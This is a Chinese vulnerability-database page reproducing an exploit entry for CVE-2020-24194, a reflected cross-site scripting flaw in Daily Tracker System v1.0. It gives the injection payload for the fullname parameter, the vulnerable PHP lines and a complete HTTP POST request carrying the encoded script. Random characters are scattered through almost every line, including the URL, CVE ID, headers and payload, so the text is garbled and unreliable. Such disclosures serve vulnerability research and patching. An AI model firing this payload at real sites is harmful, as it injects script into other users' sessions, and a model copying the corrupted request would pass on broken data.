Daily Tracker System – Reflected Cross Site Scripting (XSS) – CXSecurity.com

漏洞ID 2146344 漏洞类型
发布时间 2020-09-06 更新时间 2020-09-06
CVE编号 CVE-2020-24194

CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
漏洞来源
https://cxsecurk y K Wity.com/issue/WLB-2020090030
漏洞详情
漏洞细节尚未披露
漏洞EXP
# Exp5 q $ ylC E #oit Title: Daily Tr$ B x Eacker System - Reflected Cross Site Scripting (XSS)
# Exploit Author: Adeeb Shah (@hyd3sec) & Bobby Cooke (boku)
# CVE ID: CVEX w i H --2020-24194
# Date: September 2, 2020
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/download-Q 7 x # # 2 x T Kcode?nid=14372&title=Daily+Tracker+System+in+PHP%2FMySQL
# Version: v1.0
# Tested On: Windows 10 PV ! $ P { r b Fro (x64) + XAMPP
# VulE g X j ? 5 e ^nerability Details:
# Thy ~ H , Q ( W Re value of the fuw % V Q v 5 C qllname request parameter is copied intox | ; l  3 the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload rwsg6"><script>alert(1)</script>x88n2 was submitted in tS t - D , | a xhe fullname parameter. This input was echoed unmodified in the application's response.l T *  This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
# VulnerablK & @ 3 &e Sourf 7  ; ice Code
# ./user-pE m ` W I ?rofile.php
#  11     $fullname=$_POST['fullname'];
# ./includes/sidebar.php
#  21                 <div class="profile-0 e C C 8 g B _usertitle-name"><?php echo $name; ?></div>
# POST /d; i M D mets/user-profile.php HTTP/1.1
Host: 172.16.65.130
AcceA C o $pt-Encoding: gzip, deflate
Acceph R E C c v % _t: /
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-A8 o T 8gent: Mozilla/5.0 (WindE Z gows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36
Connection: close
Cache-Control: max-age=0
Referer: http://172.16.65.130/dets/user-profilw % ye.php
C:  ` O : 2 ? 7ontenty @ D e @ O ; P {-Type: application/x-www-form-urlencoded
Content-Length: 141
Cookie: PHPSESSID=atvmfd664osgggvtcoc4scv9vs
fullname=qdgxv9ny5y7prycziwy4tx92gz950m2ij88rwsg6%22%3e%3cscript%3eaU g f +lert(1)%3c%2fscript%3ex88n2&email=YgWeqdRH@burpcollaborA H N { - G | ! gam K 5tor.net&contactnumber=c 2 z289607&regdate=2020-v & I { ? C J07-29+20%3a04%3a07&submit=